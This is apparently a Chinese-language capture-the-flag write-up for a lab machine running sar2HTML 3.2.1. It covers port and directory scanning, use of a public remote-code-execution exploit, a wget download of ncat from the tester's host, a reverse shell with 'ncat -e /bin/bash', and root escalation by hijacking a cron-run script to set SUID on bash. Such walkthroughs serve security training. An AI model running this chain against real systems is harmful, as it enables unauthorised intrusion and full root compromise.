主要知识点
- 路径爆破
- cronjob 脚本劫持提权
具体步骤
依旧nmap 开始,开放了22和80端口
Nmap scan report for 192.168.192.35
Host is up (0.43s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
| 256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_ 256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)但是,貌似80端口没有安装任何服务,是一个apche2的默认页面,不过我们这里dirb一下,发现了robots.txt,而robots.txt里包含了一个sar2HTML的路径
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.192.35
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404,429,503,400,502
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 279]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
打开后是一个 sar2HTML 3.2.1版本,搜索一下得到一个exp
下载后执行,得到一个远程代码执行的console,但是还是不够,这里根据以往的经验,直接上传一个编译好的ncat,会快很多, 也可以尝试别的方法创建反弹shell
C:\home\kali\Documents\OFFSEC\play\DriftingBlues6\Sar> python 49344.py
Enter The url => http://192.168.192.35/sar2HTML
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command => wget 192.168.45.212:8000/ncat -O /tmp/ncat
Command => ls -l /tmp
total 2848
-rw-r--r-- 1 www-data www-data 2914424 Nov 24 16:20 ncat
Command => chmod 777 /tmp/*
Command => ls -l /tmp
total 2848
-rwxrwxrwx 1 www-data www-data 2914424 Nov 24 16:20 ncat
Command => /tmp/ncat -e /bin/bash 192.168.45.212 80而本地的nc -nlvp 80命令会收到如下
C:\home\kali\Documents\OFFSEC\play\DriftingBlues6\Sar> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.192.35] 58986
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)上传linpeas.sh并运行,则会发现,/var/www/html/finally.sh会每5分钟被sudo执行一次
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh查看finally.sh会发现它实际上是调用了write.sh,
所以我们可以直接劫持write.sh来提权
www-data@sar:/tmp$ cd /var/www/html
cd /var/www/html
www-data@sar:/var/www/html$ ls -lart
ls -lart
total 40
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
-rwxrwxrwx 1 www-data www-data 30 Jul 24 2020 write.sh
drwxr-xr-x 3 www-data www-data 4096 Jul 24 2020 .
drwxr-xr-x 5 www-data www-data 4096 Nov 24 16:29 ..
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >write.sh
echo "chmod +s /bin/bash" >write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
chmod +s /bin/bash
www-data@sar:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 7 2019 /bin/bash
www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# cat /root/proof.txt
cat /root/proof.txt
1a75d3fc92ec05ab5ae38c2a066b5118
bash-4.4#